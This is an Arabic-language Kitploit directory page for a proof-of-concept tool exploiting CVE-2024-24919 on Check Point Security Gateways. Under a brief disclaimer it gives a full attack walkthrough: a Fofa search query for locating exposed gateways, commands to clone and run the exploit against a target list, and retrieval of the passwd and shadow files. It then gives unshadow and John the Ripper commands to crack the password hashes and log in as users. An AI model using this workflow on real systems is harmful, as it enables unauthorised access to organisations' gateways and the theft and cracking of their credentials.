Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-24919 — إثبات المفهوم - CVE-2024–24919 - Check Point Security Gateways | Kitploit
أدوات/GitHubGitHub/verylazytech/cve-2024-24919
كسر كلمات المرورتحليل الثغرات الأمنيةالاستغلالجمع المعلوماتاختبار الاختراقالتعلم والتعليم
GitHubverylazytech/cve-2024-24919

CVE-2024-24919

إثبات المفهوم - CVE-2024–24919 - Check Point Security Gateways

عرض المستودع
935منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
الموقع الإلكتروني

كشف معلومات بوابات أمان Check Point - CVE-2024-24919

My Shop Medium Github Buy Me A Coffee

قد يسمح للمهاجم بقراءة معلومات معينة على بوابات أمان Check Point عند اتصالها بالإنترنت وتمكين شفرات Remote Access VPN أو Mobile Access Software. يتوفر إصلاح أمني يخفف من هذه الثغرة.

اقرأ عنه — CVE-2024-24919

إخلاء مسؤولية: هذا الدليل الإثباتي (POC) مصمم لأغراض تعليمية واختبارية أخلاقية فقط. استخدام هذه الأداة لمهاجمة أهداف دون موافقة متبادلة مسبقة غير قانوني. يتحمل المستخدم النهائي مسؤولية الامتثال لجميع القوانين المحلية والولائية والاتحادية المعمول بها. لا يتحمل المطورون أي مسؤولية ولا يكونون مسؤولين عن أي إساءة استخدام أو ضرر ناتج عن هذا البرنامج.

البدء

إيجاد الأهداف

للعثور على أهداف محتملة، استخدم Fofa (مشابه لـ Shodan.io):

  • استعلام Fofa: app=”Check_Point-SSL-Network-Extender”

Alt text

أولاً، استنسخ المستودع:

root@kitploit:~
git clone https://github.com/verylazytech/CVE-2024-24919

بعد ذلك اختر هدفك وأضفه إلى ملف list.txt بهذا التنسيق:

  • https://ip_address

تشغيل الأداة:

root@kitploit:~
python3 CVE-2024-24919.py -l list.txt

الآن هناك ناتجان محتملان:

غير ناجح:

Alt text

ناجح:

Alt text

الآن بعد العثور على ملفي passwd و shadow، يمكنك محاولة كسر التجزئة باستخدام JohnTheRipper. بعد تشغيل الأداة، ستحصل على ملفين passwd و shadow، لذا يمكنك دمجهما في ملف واحد ومحاولة كسرهما (استخدمت rockyou.txt ولكن يمكن أن تكون أي قائمة كلمات مرور):

root@kitploit:~
unshadow passwd shadow > unshadowed.txt 
root@kitploit:~
john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt

Alt text

والآن بعد كسر التجزئة، يمكننا تسجيل الدخول إلى المستخدم!

تنزيل الأداة